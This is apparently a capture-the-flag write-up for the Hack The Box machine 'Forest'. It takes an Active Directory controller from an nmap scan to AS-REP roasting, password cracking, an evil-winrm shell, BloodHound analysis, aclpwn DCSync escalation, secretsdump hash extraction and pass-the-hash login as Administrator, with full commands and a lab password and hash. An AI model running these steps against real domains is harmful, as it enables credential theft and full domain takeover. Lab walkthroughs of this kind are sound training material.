The first step as with most other boxes is to run nmap on the box.
1 nmap -sC -sV -oA nmap -v 10.10.10.161
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 PORT STATE SERVICE VERSION 53/tcp open domain? | fingerprint-strings: | DNSVersionBindReqTCP: | version |_ bind 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-02-25 11:09:14Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name) 445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB) 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port53-TCP:V=7.80%I=7%D=2/25%Time=5E54FEC5%P=x86_64-pc-linux-gnu%r(DNSV SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\ SF:x04bind\0\0\x10\0\x03"); Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 2h46m50s, deviation: 4h37m10s, median: 6m48s | smb-os-discovery: | OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3) | Computer name: FOREST | NetBIOS computer name: FOREST\x00 | Domain name: htb.local | Forest name: htb.local | FQDN: FOREST.htb.local |_ System time: 2020-02-25T03:11:35-08:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: required | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2020-02-25T11:11:31 |_ start_date: 2020-02-24T13:09:15
From this scan we can see we have a windows box that looks like an Active Directory controller.
Given that this box is an AD controller it would be best to first add the domain to our local hosts file so the DNS is propagated correctly.
1 echo "10.10.10.161 htb.local" | sudo tee -a /etc/host
Using Enum for Linux we can find further information about the AD configuration on the server. From this scan we find a user list.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 user:[Administrator] rid:[0x1f4] user:[Guest] rid:[0x1f5] user:[krbtgt] rid:[0x1f6] user:[DefaultAccount] rid:[0x1f7] user:[$331000-VK4ADACQNUCA] rid:[0x463] user:[SM_2c8eef0a09b545acb] rid:[0x464] user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465] user:[SM_75a538d3025e4db9a] rid:[0x466] user:[SM_681f53d4942840e18] rid:[0x467] user:[SM_1b41c9286325456bb] rid:[0x468] user:[SM_9b69f1b9d2cc45549] rid:[0x469] user:[SM_7c96b981967141ebb] rid:[0x46a] user:[SM_c75ee099d0a64c91b] rid:[0x46b] user:[SM_1ffab36a2f5f479cb] rid:[0x46c] user:[HealthMailboxc3d7722] rid:[0x46e] user:[HealthMailboxfc9daad] rid:[0x46f] user:[HealthMailboxc0a90c9] rid:[0x470] user:[HealthMailbox670628e] rid:[0x471] user:[HealthMailbox968e74d] rid:[0x472] user:[HealthMailbox6ded678] rid:[0x473] user:[HealthMailbox83d6781] rid:[0x474] user:[HealthMailboxfd87238] rid:[0x475] user:[HealthMailboxb01ac64] rid:[0x476] user:[HealthMailbox7108a4e] rid:[0x477] user:[HealthMailbox0659cc1] rid:[0x478] user:[sebastien] rid:[0x479] user:[lucinda] rid:[0x47a] user:[svc-alfresco] rid:[0x47b] user:[andy] rid:[0x47e] user:[mark] rid:[0x47f] user:[santi] rid:[0x480]
Removing the extra data from each line we can create a user list file to pass on to other scripts.
Using impacket we can use the user list created to find any users that do not need Kerberos pre-authentication. This will return crackable hashes for the users we input.
Using the python Script GetNPUsers.py we pass a user list to the server and are given a crackable hash in the format of your choosing (john in this case) which is saved in a file named Forest
1 sudo python3 GetNPUsers.py htb.local/ -usersfile /home/kali/Desktop/Forest/users.txt -format john -outputfile Forest.hashes
We can see that
svc-alfresco is a valid username and has a crackable password.
Cracking with john
John is an offline password cracking application that tries a wordlist against a hash. Using the
rockyou.txt wordlist on the
Forest.hashes file we should be able to crack the hash.
1 2 sudo john Forest --wordlist=/usr/share/wordlists/rockyou.txt
John should quickly find the password
s3rvice for the
Logging in with Evil-WinRM
5895 is open. We can use Evil-WinRM to login to the system with shell access.
1 evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice -s '/home/kali/Desktop/Forest/scripts/'
Having obtained shell access. Traversing to the desktop of the user reveals the
Since this box is focused on Active Directory. It’s worth checking to see if the server has any configurations errors using bloodhound to find a path to
Domain Admin. To do this we need to a few things first.
Download Bloodhound & SharpHound.ps1
Downloading bloodhound on kali linux is as easy as running
sudo apt-get install bloodhound. However you will still need to download the SharpHound.ps1 powershell script. This can be acquired from the bloodhound GitHub Repo.
If using another Linux Distribution follow the instructions on GitHub for installation.
Before you can use bloodhound you must change the default password of the neo4j database.
sudo neo4j console
- Navigate to
- Login with the Username:
neo4jand the password:
- Change the password when prompted.
- Leave the neo4j service running in the background
Evil-WinRM allows the uploading and executing of powershell scripts on a remote system.
Looking back at the connection command for evil-winrm we can see the flag
-s '/home/kali/Desktop/Forest/scripts/'. This flag defines the location of powershell scripts on your attacking machine. Set this location to wherever you have your
Going back to the evil-winrm session we logged into earlier we can now run the Sharphound Powershell script. Type in
SharpHound.ps1 and hit return. After a few seconds the script will be loaded in your evil session.
Running the evil command
menu will show the now available
1 Invoke-BloodHound -CollectionMethod All
Will create a zip folder with JSON files ready to be ingested into bloodhound.
to download the zip file from evil-winRM. simply type in
Now that we have our JSON files, Neo4j and bloodhound installed, we can being to analyse the AD configuration.
open bloodhound by typing in
bloodhound on your local machine and login with the same credentials you used for neo4j.
Drag the downloaded zip file on to the bloodhound window.
Queries and then
Find Shortest Path To Domain Admins
This will then show a diagram that shows that the user
svc-alfresco inherits rights through groups that allows the user to make domain changes to the
Access Control List via the permission
WriteDacl permission we can find how this can be exploited.
DC Sync Privileges & ACLPwn
DCSync permissions to the user we use the
aclpwn tool to make changes to the access control list.
AClPwn takes the bloodhound Domain structure and automatically does the escalation.
1 aclpwn -f svc-alfresco -ft user -d htb.local -du neo4j -dp kali
-f svc-alfrescoThe user we are escalating
-ft userThe type of what we are escalating
-d htb.localThe domain we are connecting to
-du neo4j -dp kaliThe username and password of the neo4j database where the bloodhound information is saved.
svc-alfresco now has
DCSync Attack & Secretsdump.py
Since our user now has
DCSync Privileges we are able to extract password hashes from the Domain using secretsdump.py from impacket.
1 python3 secretsdump.py SVC-ALFRESCO@10.10.10.161
Type in the password and the script will dump the password hash for every user on the domain.
We now have the password hash
Using Evil-WinRM the hash can be passed to login as the Administrator and obtain full system access.
1 2 evil-winrm -i 10.10.10.161 -u Administrator -H 32693b11e6aa90eb43d32c72a07ceea6
We now have full Admin privileges on the system. Traversing through the directories to the Administrator desktop we find the root.txt file.